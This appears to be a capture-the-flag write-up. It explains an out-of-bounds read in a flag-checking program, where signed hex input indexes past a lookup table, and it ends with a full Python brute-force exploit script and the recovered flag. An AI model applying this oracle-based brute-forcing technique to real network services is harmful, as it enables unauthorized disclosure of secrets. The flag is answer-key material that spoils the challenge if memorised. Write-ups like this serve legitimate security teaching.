Look at that guy over there! He's a bandit from the group that robs the stagecoaches in unpredictable intervals. I think he hasn't been with them for very long, so he can't tell whether you're one of them. Try to look like a bandit and talk to him. He probably won't just tell you their plan for the attack, but maybe you can ask him some questions?
nc 1412
So we have source code and binary. One look is enough to notice a strange thing in function is_flag_correct: obviously constant global varibales bin_by_hex and flag defined localy! Now we can concentrate in searching vuln and find it in function is_flag_correct:
char value1 = bin_by_hex[flag_hex[i*2 ]]; char value2 = bin_by_hex[flag_hex[i*2+1]];
where flag_hex is a user controlled array on signed bytes! So we can access memory out of array bin_by_hex.
In binary we see that we can access flag variable in stack:
So exploitation idea is to send flag of next type:
sendFlag = known_flag_part + "%02x"%(brute_byte) sendFlag += ''.join([hex_by_pass_el_index(i) for i in range(len(sendFlag),50)])
where hex_by_pass_el_index(i) gives two bytes that cause program to fetch i-th element of original flag. And we get success message when brute_byte is valid and fail message otherwise.
Here is the full exploit code:
import string import socket ERR_SUCCESS = 0 ERR_CONNECT = -1 ERR_INVALID_FLAG = -2 host = '' port = 1412 def hex_by_pass_el_index(i): return '0'+chr(0xC0+i) def build_hex_pass_guesser(p): r = '' for i in range(len(p)): if p[i]!=None: r += "%02x"%(ord(p[i])) else: r += hex_by_pass_el_index(i) return r def is_valid(s,p): buf = s.recv(10000) if 'guess' not in buf: return ERR_CONNECT s.send(p+'\n') buf = s.recv(10000) if 'Nope' not in buf: return ERR_SUCCESS else: return ERR_INVALID_FLAG def brute(alph = string.printable): s = None p = [None]*50 for k in range(5,len(p)-1): i=0 while True: if s==None: s = socket.create_connection((host,port)) s.settimeout(5) s.recv(50000) p[k] = alph[i] my_hex_pass = build_hex_pass_guesser(p) bVal = is_valid(s,my_hex_pass) #print(k,i,p,bVal) if bVal==ERR_SUCCESS: break if bVal==ERR_CONNECT: s.close() s=None if bVal==ERR_INVALID_FLAG: i += 1 print(p) return p print(''.join(brute()))
And the flag is: flag{6974736a7573746c696b65696e7468656d6f76696573}
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